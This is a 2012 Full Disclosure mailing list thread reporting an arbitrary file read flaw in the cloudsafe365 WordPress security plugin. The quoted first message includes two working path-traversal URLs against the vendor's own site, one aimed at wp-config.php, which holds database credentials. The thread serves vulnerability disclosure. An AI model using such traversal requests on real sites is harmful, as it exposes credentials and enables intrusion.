Full Disclosure mailing list archives
Re: cloudsafe365 for wordpress: file disclosure
From: Christian Sciberras <uuf6429 () gmail com>
Date: Tue, 28 Aug 2012 11:00:25 +0200
So this plugin supposedly helps securing a website? ... On Tue, Aug 28, 2012 at 10:50 AM, Henri Salo <henri () nerv fi> wrote:
On Tue, Aug 28, 2012 at 10:29:46AM +0200, Jan van Niekerk wrote:This wordpress security plugin lets you read arbitrary files on the system. Looking at the code, there will be plenty of stuff like this. Demo:http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.phphttp://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.phpDisclosure timeline: * Today: visit wordpress.org * Try to report bug * System wants login * Visit web site: vendor has no e-mail address and stupid one-liner contact form and hidden name * Stuff it, I'm not going to phone themI can verify and report this. Could you list all the vulnerabilities you can find from the plugin? You can also contact plugins@wordpress.orgaddress in case you found vulnerabilities from WordPress plugins in the future. - Henri Salo _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- cloudsafe365 for wordpress: file disclosure Jan van Niekerk (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Henri Salo (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Christian Sciberras (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Henri Salo (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Ivan Carlos (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Christian Sciberras (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Henri Salo (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure craig deveson (Aug 28)